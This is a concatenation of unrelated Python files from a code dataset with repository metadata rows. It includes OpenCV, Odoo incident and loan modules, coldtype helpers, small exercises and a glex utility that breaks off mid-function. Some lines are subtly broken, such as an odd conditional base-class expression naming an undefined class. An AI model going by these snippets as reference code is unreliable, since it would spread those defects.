        self.img_unfiltered = self.input(0)

        # cv2.bilateralFilter expects integer parameters.
        diameter = int(self.input(1))
        sigma_color = int(self.input(2))
        sigma_space = int(self.input(3))

        self.img_filtered = cv2.bilateralFilter(
            self.img_unfiltered, diameter, sigma_color, sigma_space)

        self.main_widget.show_image(self.img_filtered)
        self.set_output_val(0, self.img_filtered)

    def get_data(self):
        # No instance state needs to be serialized.
        return {}

    def set_data(self, data):
        # Nothing to restore.
        pass

    # optional - important for threading - stop everything here
    def removing(self):
        pass
| [
"[email protected]"
]
| |
0c8e3e9921b7d630d6e0adc83c74f296d3c6d153 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_196/ch63_2020_04_27_14_18_42_371021.py | c92ce60be1971d984d7ff5df1eb20c1502c28393 | []
def nome_usuario(str):  # e.g. "isabellabvo@..."
    """Return the username part of an e-mail address (text before '@').

    The original body was not valid Python (`a = [::- pos_arroba(str)]`
    referenced an undefined name inside a malformed slice).  partition()
    returns the whole string unchanged when no '@' is present.
    """
    return str.partition('@')[0]
"[email protected]"
]
| |
49aad707822cea050e45c3f070042ccf5c2f2dba | a8123a86db99b9365b10ba76dd509d58caa7bc10 | /python/practice/start_again/2020/11032020/Assesment6.py | c505235f1844afeeb02c99144c972776b142ec93 | []
| no_license | smohapatra1/scripting | c0404081da8a10e92e7c7baa8b540acc16540e77 | 3628c9109204ad98231ae8ee92b6bfa6b27e93cd | refs/heads/master | 2023-08-22T20:49:50.156979 | 2023-08-22T20:43:03 | 2023-08-22T20:43:03 | 147,619,016 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 216 | py | #Use List Comprehension to create a list of the first letters of every word in the string below:
# List comprehension collecting the first letter of every word in the string.
st = 'Create a list of the first letters of every word in this string'
mylist = [word[0] for word in st.split()]
print(mylist)
"[email protected]"
]
| |
4e8b7d7b60995bf843c9a4de85b38976e365d990 | 84a1f9d626828b6ecaee4ef037081f4d8750a990 | /编程/4月/4.13/test_survey.py | 9c1c877c16243557dde6b28b5c1afc599957f8ed | []
| no_license | dujiaojingyu/Personal-programming-exercises | 5a8f001efa038a0cb3b6d0aa10e06ad2f933fe04 | 72a432c22b52cae3749e2c18cc4244bd5e831f64 | refs/heads/master | 2020-03-25T17:36:40.734446 | 2018-10-01T01:47:36 | 2018-10-01T01:47:36 | 143,986,099 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,840 | py | __author__ = "Narwhale"
# import unittest
# from survey import AnonymousSurvey
#
# class TestAnonymousSurvey(unittest.TestCase):
# '''测试survey.py'''
# def test_store_single_response(self):
# '''测试单个答案会不会妥善储存'''
# question = "What langage did you first learn to speak?"
# my_survey = AnonymousSurvey(question)
# my_survey.store_response('English')
# self.assertIn('English',my_survey.responses)
#
# def test_store_three_response(self):
# '''测试三个答案会不会妥善储存'''
# question = "What langage did you first learn to speak?"
# my_survey = AnonymousSurvey(question)
# responses = ['English','Spanish','Mandarin']
# for response in responses:
# my_survey.store_response(response)
# for response in responses:
# self.assertIn(response,my_survey.responses)
#
import unittest
from survey import AnonymousSurvey
class TestAnonymousSurvey(unittest.TestCase):
    """Tests for survey.py."""

    def setUp(self):
        """Create one survey object and a set of answers shared by all tests."""
        question = "What langage did you first learn to speak?"
        self.my_survey = AnonymousSurvey(question)
        self.responses = ['English', 'Spanish', 'Mandarin']

    def test_store_single_response(self):
        """A single answer is stored properly."""
        first = self.responses[0]
        self.my_survey.store_response(first)
        self.assertIn(first, self.my_survey.responses)

    def test_store_three_response(self):
        """Three answers are all stored properly."""
        for answer in self.responses:
            self.my_survey.store_response(answer)
        for answer in self.responses:
            self.assertIn(answer, self.my_survey.responses)
| [
"[email protected]"
]
| |
9de052555dc7ee6ed65cad5a454df3b5f3f305ae | f7a20374403b55189cc5db6e8fa34d0ba290387c | /modules/incidents/incidents.py | 6d49906a1da357b35110f8d5cd751a05e35475d1 | []
| no_license | dark-ice/upink_modules | 1a7b5a165cc5e05396c62cf33c261b907c23e33c | c497bf87a39796f1df3877542359b1927bec3a76 | refs/heads/master | 2021-05-01T04:40:16.436666 | 2014-04-12T15:09:31 | 2014-04-12T15:09:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,945 | py | # -*- encoding: utf-8 -*-
from datetime import datetime, timedelta
import pytz
from openerp import tools
from openerp.osv import fields, osv
from openerp.osv.orm import Model
STATES = (
('draft', 'Черновик'),
('completion', 'На доработке инициатором'),
('decision', 'Принятие решения'),
('in_pipeline', 'В работе'),
('completion_performer', 'На доработке исполнителем'),
('approval', 'Сдано на утверждение'),
('accepted', 'Принято инициатором'),
('cancel', 'Отмена'),
)
def format_date_tz(date, tz=None):
    """Convert a server timestamp to its local-timezone representation.

    `date` may be a "%Y-%m-%d %H:%M:%S" string or a datetime; strings are
    parsed and stamped as UTC.  When `tz` is omitted, the server's detected
    timezone is used.
    """
    if isinstance(date, str):
        date = datetime.strptime(date, "%Y-%m-%d %H:%M:%S").replace(tzinfo=pytz.utc)
    if tz is None:
        tz = pytz.timezone(tools.detect_server_timezone())
    f = tools.DEFAULT_SERVER_DATETIME_FORMAT
    # NOTE(review): the same format is passed for input and output, so
    # server_to_local_timestamp presumably only shifts the timezone — confirm.
    return tools.server_to_local_timestamp(date, f, f, tz)
def parse_timedelta(timedelta_str):
    """Normalize str(timedelta) output to a colon-separated form.

    "2 days, 3:04:05" becomes "2:3:04:05" — the four-component layout that
    str_to_seconds() expects.  Strings without a day part pass through
    unchanged.
    """
    if 'day' in timedelta_str:
        # Bug fix: str.replace returns a *new* string; the original code
        # discarded the result, so the "N day(s), " prefix was never rewritten.
        timedelta_str = timedelta_str.replace(' days, ', ':').replace(' day, ', ':')
    return timedelta_str
def str_to_seconds(timedelta_str):
    """Convert "[D:]H:MM:SS" (see parse_timedelta) to a total-seconds int."""
    timedelta_list = timedelta_str.split(':')
    total_seconds = int(timedelta_list[-1])          # seconds
    total_seconds += int(timedelta_list[-2]) * 60    # minutes
    total_seconds += int(timedelta_list[-3]) * 60 * 60  # hours
    if len(timedelta_list) == 4:
        # Bug fix: the original added the *hours* component ([-3]) again
        # here; the leading component of a 4-part string is days ([-4]).
        total_seconds += int(timedelta_list[-4]) * 60 * 60 * 24
    return total_seconds
class Incidents(Model):
_name = 'ink.incidents'
_description = u'Реестр инцидентов INK'
_order = "id desc"
    def change_person(self, cr, user, ids, person_id, type='author', context=None):
        """onchange helper: derive department/manager fields from an employee.

        `type` selects the field prefix ('author' or 'performer').  Returns an
        onchange-style {'value': {...}} dict for the (single) employee read;
        0 is used when the employee has no department or manager.  Returns
        None if the read yields nothing.
        """
        department_str = '{0}_department_id'.format(type)
        parent_str = '{0}_parent_id'.format(type)
        for person in self.pool.get('hr.employee').read(cr, user, [person_id], ['department_id', 'parent_id'], context):
            department = 0
            parent = 0
            # many2one values read back as (id, name) tuples or False.
            if person['department_id']:
                department = person['department_id'][0]
            if person['parent_id']:
                parent = person['parent_id'][0]
            return {'value': {department_str: department, parent_str: parent}}
    def _check_access(self, cr, uid, ids, name, arg, context=None):
        """
        Functional-field getter: compute per-record UI roles dynamically.

        Builds an access string per record: 'a' when the current user is the
        initiator (or the initiator's manager), 'p' when the responsible
        performer (or the performer's manager).  The requested field name
        encodes the role in its 7th character ('check_a' -> 'a',
        'check_p' -> 'p').
        """
        employee_pool = self.pool.get('hr.employee')
        employee = employee_pool.get_employee(cr, uid, uid)
        res = {}
        for record in self.read(cr, uid, ids, ['author_id', 'author_parent_id', 'performer_id', 'performer_parent_id']):
            access = str()
            # Initiator (author) or the author's manager.
            if (record['author_id'] and record['author_id'][0] == employee.id) \
                    or (record['author_parent_id'] and record['author_parent_id'][0] == employee.id):
                access += 'a'
            # Responsible performer or the performer's manager.
            if (record['performer_id'] and record['performer_id'][0] == employee.id) \
                    or (record['performer_parent_id'] and record['performer_parent_id'][0] == employee.id):
                access += 'p'
            val = False
            # name is 'check_a' or 'check_p'; index 6 holds the role letter.
            letter = name[6]
            if letter in access:
                val = True
            res[record['id']] = val
        return res
_columns = {
'id': fields.integer('№', size=11, select=True),
'create_date': fields.datetime('Дата создания', readonly=True),
'author_id': fields.many2one('hr.employee', 'Инициатор', readonly=True),
'author_department_id': fields.related(
'author_id',
'department_id',
relation='hr.department',
type='many2one',
string='Направление инициатора',
store=True
),
'author_parent_id': fields.related(
'author_id',
'parent_id',
relation='hr.employee',
type='many2one',
string='Руководитель инициатора',
store=True
),
'name': fields.char(
'Тема инцидента',
size=250,
readonly=True,
states={
'draft': [('readonly', False), ('required', True)],
'completion': [('readonly', False), ('required', True)]
}),
'description': fields.text(
'Описание инцидента',
readonly=True,
states={
'draft': [('readonly', False), ('required', True)],
'completion': [('readonly', False), ('required', True)]
}
),
'type': fields.selection(
(
('fail', 'Сбой в работе'),
('issues', 'Текущие вопросы'),
), 'Тип инцидента',
readonly=True,
states={
'draft': [('readonly', False), ('required', True)],
'completion': [('readonly', False), ('required', True)]
}
),
'document_type': fields.selection(
(
('cash-memo', 'Товарный чек'),
('invoice', 'Счет на оплату'),
('mail', 'Почтовая отправка'),
('receipt for repairs', 'Квитанция о ремонте'),
('bill', 'Товарная (расходная) накладная'),
('movement', 'Накладная на перемещение'),
), 'Тип документа',
readonly=True,
states={
'draft': [('readonly', False)],
'completion': [('readonly', False)]
}
),
'document_number': fields.char(
'№ документа',
size=250,
readonly=True,
states={
'draft': [('readonly', False)],
'completion': [('readonly', False)]
}),
'performer_id': fields.many2one(
'hr.employee',
'Ответственный исполнитель',
readonly=True,
states={
'draft': [('readonly', False), ('required', True)],
'completion': [('readonly', False), ('required', True)]
}
),
'performer_department_id': fields.related(
'performer_id',
'department_id',
relation='hr.department',
type='many2one',
string='Направление исполнителя',
store=True
),
'performer_parent_id': fields.related(
'performer_id',
'parent_id',
relation='hr.employee',
type='many2one',
string='Руководитель исполнителя',
store=True
),
'deadline_date': fields.datetime(
'Срок исполнения',
readonly=True,
states={
'draft': [('readonly', False), ('required', True)],
'completion': [('readonly', False), ('required', True)]
}),
'time_over_decision': fields.char('Время превышения принятия решения', size=20, readonly=True),
'time_over_waiting_initiator': fields.char('Время превышения ожидания ответа инициатора', size=20, readonly=True),
'time_over_deadlines': fields.char('Время превышения сроков выполнения', size=20, readonly=True),
'state': fields.selection(STATES, 'Статус', size=100, readonly=True),
'history_ids': fields.one2many('ink.incidents.history', 'incident_id', 'История переходов', readonly=True),
'fallback': fields.text(
'Обратная связь от исполнителя',
),
'comment_completion': fields.text(
'Комментарий по доработке (от исполнителя)',
),
'comment_approval': fields.text(
'Комментарий по доработке (от инициатора)',
),
'comment_ids': fields.one2many('ink.incidents.comment', 'incident_id', 'Инцидент', readonly=False),
# Права
'check_a': fields.function(
_check_access,
method=True,
string='Проверка на инициатора',
type='boolean',
invisible=True
),
'check_p': fields.function(
_check_access,
method=True,
string='Проверка на ответственного',
type='boolean',
invisible=True
),
}
_defaults = {
'author_id': lambda s, c, u, cnt: s.pool.get('hr.employee').get_employee(c, u, u).id,
'state': 'draft',
'check_a': True,
}
    def write(self, cr, user, ids, vals, context=None):
        """Intercept writes to track SLA overruns and log state transitions.

        When `vals` moves a record to a new state: accumulate how long the
        record overstayed certain states (with a 1-hour grace period) into
        the time_over_* text fields, enforce required free-text fields for
        specific transitions, and append a history entry for the transition.
        """
        history_pool = self.pool.get('ink.incidents.history')  # NOTE(review): unused
        next_state = vals.get('state', False)
        check_date = datetime.now(pytz.utc)
        for record in self.browse(cr, user, ids, context):
            if next_state and next_state != record.state:
                # Time spent past the 1-hour grace while awaiting a decision.
                if record.state == 'decision':
                    if record.history_ids:
                        new_delta_seconds = 0
                        state_date = datetime.strptime(record.history_ids[-1].create_date, "%Y-%m-%d %H:%M:%S").replace(tzinfo=pytz.utc)
                        delta = check_date - state_date
                        record_delta = 0
                        if record.time_over_decision:
                            record_delta = str_to_seconds(record.time_over_decision)
                        # NOTE(review): the guard tests delta.seconds only
                        # (which excludes whole days), so e.g. "1 day 10 min"
                        # is not recorded — total_seconds() was likely meant.
                        if delta.seconds > 3600:
                            new_delta_seconds = record_delta + delta.seconds + delta.days*3600*24 - 3600
                            vals['time_over_decision'] = parse_timedelta(str(timedelta(seconds=new_delta_seconds)))
                # Time the initiator kept the record on rework before
                # sending it back for a decision.
                if record.state == 'completion' and next_state == 'decision':
                    if record.history_ids:
                        new_delta_seconds = 0
                        record_delta = 0
                        state_date = datetime.strptime(record.history_ids[-1].create_date, "%Y-%m-%d %H:%M:%S").replace(tzinfo=pytz.utc)
                        delta = check_date - state_date
                        if record.time_over_waiting_initiator:
                            record_delta = str_to_seconds(record.time_over_waiting_initiator)
                        if delta.seconds > 3600:
                            new_delta_seconds = record_delta + delta.seconds + delta.days*3600*24 - 3600
                            vals['time_over_waiting_initiator'] = parse_timedelta(str(timedelta(seconds=new_delta_seconds)))
                # On acceptance, record how far past the deadline we finished.
                if next_state == 'accepted':
                    new_delta_seconds = 0
                    record_delta = 0
                    state_date_deadline = datetime.strptime(record.deadline_date, "%Y-%m-%d %H:%M:%S").replace(tzinfo=pytz.utc)
                    if record.time_over_deadlines:
                        record_delta = str_to_seconds(record.time_over_deadlines)
                    delta = check_date - state_date_deadline
                    if delta.days >= 0:
                        new_delta_seconds = record_delta + delta.seconds + delta.days*3600*24
                        vals['time_over_deadlines'] = parse_timedelta(str(timedelta(seconds=new_delta_seconds)))
                # Required free-text fields for specific transitions.
                if record.state == 'in_pipeline' and next_state == 'approval' and not record['fallback'] and not vals.get('fallback'):
                    raise osv.except_osv('', 'Нужно заполнить "Обратная связь от исполнителя"')
                if next_state == 'completion' and not record['comment_completion'] and not vals.get('comment_completion'):
                    raise osv.except_osv('', 'Нужно заполнить "Комментарий по доработке (от исполнителя)"')
                if next_state == 'completion_performer' and not record['comment_approval'] and not vals.get('comment_approval'):
                    raise osv.except_osv('', 'Нужно заполнить "Комментарий по доработке (от инициатора)"')
                # Log the transition in the embedded history table.
                vals.update({'history_ids': [(0, 0, {'name': next_state})]})
        return super(Incidents, self).write(cr, user, ids, vals, context)
def add_note(self, cr, uid, ids, context=None):
view_id = self.pool.get('ir.ui.view').search(
cr,
uid,
[('name', 'like', 'ink.incidents.add.note.form1')]
)
return {
'view_type': 'form',
'view_mode': 'form',
'res_model': 'ink.incidents.comment',
'name': 'Комментарий',
'view_id': view_id,
'type': 'ir.actions.act_window',
'context': {
'incident_id': ids[0],
},
'target': 'new',
'nodestroy': True,
}
Incidents()
class IncidentsHistory(Model):
    """State-transition log lines embedded in an incident (one2many target)."""
    _name = 'ink.incidents.history'
    _description = u'Реестр инцидентов INK - История переводов'

    _columns = {
        # Target state of the transition — same STATES list as the incident.
        'name': fields.selection(STATES, 'Статус', size=100, readonly=True),
        'create_date': fields.datetime('Дата и время перевода'),
        'create_uid': fields.many2one('res.users', 'Перевел'),
        'incident_id': fields.many2one('ink.incidents', 'Инцидент'),
    }

IncidentsHistory()
class IncidentsComment(Model):
    """Free-text comments attached to an incident via a popup form."""
    _name = 'ink.incidents.comment'
    _description = u'Реестр инцидентов INK - Комментарии'

    _columns = {
        'name': fields.text('Комментарий'),
        'create_date': fields.datetime('Дата и время создания'),
        'create_uid': fields.many2one('res.users', 'Автор'),
        'incident_id': fields.many2one('ink.incidents', 'Инцидент', invisible=True),
    }

    def action_add(self, cr, uid, ids, context=None):
        """Popup button handler: link the new comment(s) to the incident.

        The incident id travels in the action context (set by
        Incidents.add_note); re-write each comment with it, then close
        the popup window.
        """
        if context is None:
            context = {}
        incident = context.get('incident_id')
        for obj in self.browse(cr, uid, ids, context=context):
            self.write(
                cr,
                uid,
                obj.id,
                {
                    'name': obj.name,
                    'incident_id': incident
                })
        return {'type': 'ir.actions.act_window_close'}

# Bug fix: this line previously instantiated IncidentsHistory() a second time
# instead of IncidentsComment() (copy-paste error), so the comment model was
# never registered the way the sibling models are.
IncidentsComment()
"[email protected]"
]
| |
c0ca10e6617bcc841033face0deb5832c499e704 | 3de69270140c915a71611b07f9e5ae7e0ba5d3e6 | /hedgehog/__init__.py | af439387011fcc89560aa07bba8500c8a529cdb3 | [
"MIT"
]
| permissive | dongyu1990/hedgehog | f66380f77751d2dd6dc8d888ed4634d3cc8d9225 | 98c97d0c70b4aa01b0bfb1115a1dfbe18f976ae9 | refs/heads/master | 2022-09-15T14:21:15.701239 | 2020-05-31T13:12:40 | 2020-05-31T13:12:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 405 | py | import os
from .bayes_net import BayesNet
from .examples import load_alarm
from .examples import load_asia
from .examples import load_grades
from .examples import load_sprinkler
__all__ = [
'BayesNet',
'load_alarm',
'load_asia',
'load_grades',
'load_sprinkler'
]
def cli_hook():
here = os.path.dirname(os.path.realpath(__file__))
os.system(f'streamlit run {here}/gui.py')
| [
"[email protected]"
]
| |
f2a49225a1fc85adf7640b670ac6c14374ae7785 | 280342a3961132a6f62507e17cb0dadf3598f2ea | /models/extends_financiera_prestamo_cuota.py | 96a9a2953247b4107c7c846ec38bf120d3c9ebfe | []
| no_license | levislibra/financiera_pagos_360 | 5e8f6f2fe43311ea3b918daff359ec126ecadc0b | 4881773281e970ff23c3c9e913ee0a5260e91502 | refs/heads/master | 2023-07-06T01:09:20.089773 | 2023-06-21T14:57:10 | 2023-06-21T14:57:10 | 205,934,743 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,869 | py | # -*- coding: utf-8 -*-
from openerp import models, fields, api, _
from datetime import datetime, timedelta, date
PAGOS360_MONTO_MINIMO = 10
class ExtendsFinancieraPrestamoCuota(models.Model):
_inherit = 'financiera.prestamo.cuota'
_name = 'financiera.prestamo.cuota'
pagos_360_generar_pago_voluntario = fields.Boolean('Pagos360 - Generar cupon de pago voluntario')
pagos_360_solicitud_id = fields.Integer('Pagos360 - ID de la solicitud')
pagos_360_solicitud_previa1_id = fields.Integer('Pagos360 - ID de la solicitud previa 1')
pagos_360_solicitud_previa1_fecha = fields.Date('Pagos360 - Fecha de la solicitud previa 1')
pagos_360_solicitud_previa2_id = fields.Integer('Pagos360 - ID de la solicitud previa 2')
pagos_360_solicitud_previa2_fecha = fields.Date('Pagos360 - Fecha de la solicitud previa 2')
pagos_360_solicitud_id_origen_pago = fields.Integer('Pagos360 - ID de la solicitud de pago', readonly=1)
pagos_360_solicitud_state = fields.Selection([
('pending', 'Pendiente'), ('paid', 'Pagada'),
('expired', 'Expirada'), ('reverted', 'Revertida')],
string='Pagos360 - Estado', readonly=True, default='pending')
pagos_360_first_due_date = fields.Date('Pagos360 - Primer Vencimiento')
pagos_360_first_total = fields.Float('Pagos360 - Importe', digits=(16,2))
pagos_360_second_due_date = fields.Date('Pagos360 - Segundo Vencimiento')
pagos_360_second_total = fields.Float('Pagos360 - Importe', digits=(16,2))
pagos_360_barcode = fields.Char('Pagos360 - Barcode')
pagos_360_checkout_url = fields.Char('Pagos360 - Url de pago online')
pagos_360_barcode_url = fields.Char('Pagos360 - Url imagen del codigo de barras')
pagos_360_pdf_url = fields.Char('Pagos360 - Url de cupon de pago en pdf')
# Nueva integracion
solicitud_ids = fields.One2many('financiera.pagos360.solicitud', 'cuota_id', 'Solicitudes de Pago')
@api.one
def pagos_360_crear_solicitud(self):
if self.state in ('activa', 'judicial', 'incobrable') and self.saldo >= PAGOS360_MONTO_MINIMO:
solicitud_id = self.env['financiera.pagos360.solicitud'].crear_solicitud(self)
solicitud_id.generar_solicitud()
@api.one
def pagos_360_cobrar_y_facturar(self, payment_date, journal_id, factura_electronica, amount, invoice_date, punitorio_stop_date, solicitud_id=None):
print("pagos_360_cobrar_y_facturar")
partner_id = self.partner_id
fpcmc_values = {
'partner_id': partner_id.id,
'company_id': self.company_id.id,
}
multi_cobro_id = self.env['financiera.prestamo.cuota.multi.cobro'].create(fpcmc_values)
partner_id.multi_cobro_ids = [multi_cobro_id.id]
# Fijar fecha punitorio
self.punitorio_fecha_actual = punitorio_stop_date
print("Punitorio stop date: ", str(punitorio_stop_date))
if self.saldo > 0:
self.confirmar_cobrar_cuota(payment_date, journal_id, amount, multi_cobro_id)
if len(multi_cobro_id.payment_ids) > 0:
if solicitud_id:
solicitud_id.pagos_360_payment_id = multi_cobro_id.payment_ids[0]
# Facturacion cuota
if not self.facturada:
fpcmf_values = {
'invoice_type': 'interes',
'company_id': self.company_id.id,
}
multi_factura_id = self.env['financiera.prestamo.cuota.multi.factura'].create(fpcmf_values)
self.facturar_cuota(invoice_date, factura_electronica, multi_factura_id, multi_cobro_id)
if multi_factura_id.invoice_amount == 0:
multi_factura_id.unlink()
multi_factura_punitorio_id = None
if self.punitorio_a_facturar > 0:
fpcmf_values = {
'invoice_type': 'punitorio',
'company_id': self.company_id.id,
}
multi_factura_punitorio_id = self.env['financiera.prestamo.cuota.multi.factura'].create(fpcmf_values)
self.facturar_punitorio_cuota(invoice_date, factura_electronica, multi_factura_punitorio_id, multi_cobro_id)
if multi_factura_punitorio_id != None and multi_factura_punitorio_id.invoice_amount == 0:
multi_factura_punitorio_id.unlink()
| [
"[email protected]"
]
| |
bb73a8d6d66d5da10e7f44de054504874ad8a460 | 08f484c61bf303ee2ec78aff9960f4812fe1e839 | /coldtype/helpers.py | 5449040cdd452d951ffbae72f5c94dca7a01bca1 | [
"Apache-2.0"
]
| permissive | rohernandezz/coldtype | 02bee08e021be8dfe45328076c512f06ea8f13ae | 724234fce454699a469d17b6c78ae50fa8138169 | refs/heads/main | 2023-07-27T16:09:10.696755 | 2021-09-11T21:17:55 | 2021-09-11T21:17:55 | 405,537,609 | 0 | 0 | Apache-2.0 | 2021-09-12T03:34:29 | 2021-09-12T03:34:28 | null | UTF-8 | Python | false | false | 2,541 | py | from pathlib import Path
from defcon import Font as DefconFont
from coldtype.text.reader import normalize_font_path, StyledString
from coldtype.pens.datpen import DATPens
from coldtype.interpolation import norm, interp_dict, lerp, loopidx
from random import Random
def sibling(root, file):
    """Return `file` resolved next to `root` (i.e. inside root's parent dir)."""
    return Path(root).parent / file
def raw_ufo(path):
    """Open `path` as a raw defcon Font (path is normalized first)."""
    return DefconFont(normalize_font_path(path))
def ßhide(el):
    """Hide `el` from a composition: always returns None (counterpart of ßshow)."""
    return None
def ßshow(el):
    """Show `el`: returns it unchanged (counterpart of ßhide)."""
    return el
def cycle_idx(arr, idx):
    """Wrap `idx` around `arr`: below zero jumps to the last index,
    past the end jumps back to 0, in-range values pass through."""
    if idx < 0:
        return len(arr) - 1
    if idx >= len(arr):
        return 0
    return idx
def random_series(start=0, end=1, seed=0, count=5000):
    """Return `count` reproducible uniform samples in [start, end),
    drawn from a private Random seeded with `seed`."""
    rnd = Random()
    rnd.seed(seed)
    span = end - start
    return [start + rnd.random() * span for _ in range(count)]
def show_points(pen, style, offcurves=True, filter=lambda i: True):
    """Return DATPens labelling the point indices of `pen` (debug aid).

    With offcurves=True every point is labelled via pen.map_points;
    otherwise only the last point of each contour segment in pen.value.
    `filter` selects which indices receive a label.
    """
    pt_labels = DATPens()
    if offcurves:
        def labeller(idx, x, y):
            if filter(idx):
                pt_labels.append(StyledString(str(idx), style).pen().translate(x, y))
        pen.map_points(labeller)
    else:
        # NOTE(review): pen.value appears to be (command, points) pairs —
        # confirm against the DATPen implementation.
        for idx, (m, pts) in enumerate(pen.value):
            if len(pts) > 0 and filter(idx):
                pt_labels += StyledString(str(idx), style).pen().translate(*pts[-1])
    return pt_labels
_by_uni = None
_by_glyph = None
_class_lookup = None
def _populate_glyphs_unis():
    """Load assets/glyphNamesToUnicode.txt into the module lookup tables.

    Each data line is "<glyphname> <hex-codepoint> <class> ..."; lines that
    start with "#" are comments.  Fills _by_uni (codepoint -> name),
    _by_glyph (name -> codepoint) and _class_lookup (name -> class).
    """
    global _by_uni
    global _by_glyph
    global _class_lookup
    _by_uni = {}
    _by_glyph = {}
    _class_lookup = {}
    # The disabled try/except that used to wrap this block (left behind as
    # "#try:" / "if True:" / "#except: pass") has been removed: a failure to
    # read or parse the asset file should surface, not be dead scaffolding.
    lines = (Path(__file__).parent.parent / "assets/glyphNamesToUnicode.txt").read_text().split("\n")
    for line in lines:
        # Skip comments and blank lines (a trailing newline previously
        # produced an empty line that crashed on indexing).
        if not line or line.startswith("#"):
            continue
        name, codepoint, glyph_class = line.split(" ")[:3]
        uni = int(codepoint, 16)
        _by_uni[uni] = name
        _by_glyph[name] = uni
        _class_lookup[name] = glyph_class
def uni_to_glyph(u):
    """Return the glyph name for decimal codepoint `u`, or None if unknown.

    Lazily populates the module lookup tables on first use.
    """
    if not _by_uni:
        _populate_glyphs_unis()
    return _by_uni.get(u)
def glyph_to_uni(g):
    """Return the decimal codepoint for glyph name `g`, or None if unknown.

    A few comma-accent glyph names are aliased to their cedilla forms, and
    kgreenlandic to kra, before the lookup.  Lazily populates the module
    lookup tables on first use.
    """
    lowered = g.lower()
    if lowered in {
        "gcommaaccent",
        "kcommaaccent",
        "lcommaaccent",
        "ncommaaccent",
        "rcommaaccent",
    }:
        g = g.replace("commaaccent", "cedilla")
    elif lowered == "kgreenlandic":
        g = g.replace("greenlandic", "ra")
    if not _by_glyph:
        _populate_glyphs_unis()
    return _by_glyph.get(g)
def glyph_to_class(g):
    """Return the Unicode class string for glyph name `g`, or None if unknown.

    Lazily populates the module lookup tables on first use.
    """
    if not _class_lookup:
        _populate_glyphs_unis()
    return _class_lookup.get(g)
"[email protected]"
]
| |
5bdb03989f229d884781faa92039d3ae802ef1cd | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2276/60580/316515.py | 8b6451c802044f3f3c441502c4705c5b7a3a4460 | []
def manage(R, C, r0, c0):
    """Visit every cell of an R x C grid in a clockwise spiral from (r0, c0).

    Returns the [row, col] pairs in visiting order; spiral positions that
    fall outside the grid are skipped (LeetCode 885, Spiral Matrix III).
    """
    visited = [[r0, c0]]
    total = R * C
    if total == 1:
        return visited
    # Leg lengths grow 1,1,2,2,3,3,...: east/south legs use k steps,
    # west/north legs use k + 1.
    for k in range(1, 2 * (R + C), 2):
        for dr, dc, steps in ((0, 1, k), (1, 0, k), (0, -1, k + 1), (-1, 0, k + 1)):
            for _ in range(steps):
                r0 += dr
                c0 += dc
                if 0 <= r0 < R and 0 <= c0 < C:
                    visited.append([r0, c0])
                    if len(visited) == total:
                        return visited
    return visited
# Read grid size and start position from stdin, then print the spiral order.
R = int(input())
C = int(input())
r0 = int(input())
c0 = int(input())
result = manage(R, C, r0, c0)
print(result)
| [
"[email protected]"
]
| |
6cd50fc250fd30608492a7d43a5d379ded730f9b | ae1e5b78fcbb88225b414fbdaecaa3783ae37fd8 | /guillotina_glex/utility.py | 2587ed35b06a46f6a203c894d716ceb9f9a15e9e | []
| no_license | vangheem/guillotina_glex | d65d7cfce8702a3b31ca5516f001f9bb89b43707 | ef22a7c42191d6a8492e6aceb81273a326eaa6aa | refs/heads/master | 2021-01-06T20:35:35.059172 | 2017-09-05T00:33:22 | 2017-09-05T00:33:22 | 99,527,470 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,911 | py | import asyncio
import base64
import json
import logging
import os
import aiohttp
from guillotina import app_settings, configure
from guillotina.async import IAsyncUtility
from guillotina.component import getUtility
from guillotina_gcloudstorage.interfaces import IGCloudBlobStore
from guillotina_gcloudstorage.storage import OBJECT_BASE_URL
from .db import DB
logger = logging.getLogger(__name__)
_ignored_titles = (
'workout',
'pilates',
'all about',
'songs',
'insanity',
'lesson',
'disc'
)
OMDB_URL = 'http://www.omdbapi.com/'
class IGlexUtility(ActorSystemMessage if False else IAsyncUtility):  # pragma: no cover
    pass
@configure.utility(provides=IGlexUtility)
class GlexUtility:
def __init__(self, settings={}, loop=None):
self._settings = settings
self._loop = loop
    async def initialize(self, app=None):
        """Start the utility: load video listings, then run the metadata worker.

        NOTE(review): this coroutine never returns — after loading the
        configured bucket folders it loops forever consuming the queue;
        presumably the framework runs it as a background task.  Failures per
        item are logged and retried after a 1-second pause.
        """
        self._queue = asyncio.Queue()
        self._db = DB()
        for prefix in app_settings["bucket_folders"]:
            await self.load_videos(prefix)
        while True:
            try:
                video = await self._queue.get()
                await self.get_video_data(video)
            except Exception:
                logger.warn(
                    'error getting video data',
                    exc_info=True)
                await asyncio.sleep(1)
            finally:
                self._queue.task_done()
    async def get_video_data(self, video):
        """Fetch OMDb metadata for one bucket video, caching results on disk.

        The cache file name is the base64 of the video id plus "-info" in the
        configured download folder.  Ignored (non-movie) titles are skipped;
        several name variants are tried against OMDb; a negative result is
        cached as {"Response": "False"} so it is not retried.
        """
        filename = video['name'].split('/')[-1]
        video['filename'] = filename
        # Strip the extension, then drop any remaining dots from the title.
        name = '.'.join(filename.split('.')[:-1]).replace('.', '')
        if not os.path.exists(app_settings['download_folder']):
            os.mkdir(app_settings['download_folder'])
        storage_filename = '{}-info'.format(
            base64.b64encode(video['id'].encode('utf8')).decode('utf8'))
        filepath = os.path.join(app_settings['download_folder'],
                                storage_filename)
        # Cache hit: reuse previously fetched metadata.
        if os.path.exists(filepath):
            with open(filepath) as fi:
                video['data'] = json.loads(fi.read())
            logger.warn(f'found cached data for movie for (unknown)')
            return

        # Skip titles that are clearly not movies (workouts, lessons, ...).
        for ignored in _ignored_titles:
            if ignored in name.lower():
                return

        # Candidate search names: as-is, underscores as spaces, and the text
        # before the first '-', ':' or '(' separator.
        tries = [
            name,
            name.replace('_', ' ')
        ]
        for removed in ('-', ':', '('):
            if removed in name:
                tries.append(name.split(removed)[0].strip())

        for movie_name in tries:
            logger.warn(f'searching for movie name {movie_name}')
            async with aiohttp.ClientSession() as session:
                resp = await session.get(OMDB_URL, params={
                    't': movie_name,
                    'apikey': app_settings['omdb_api_key']
                })
                if resp.status == 200:
                    data = await resp.json()
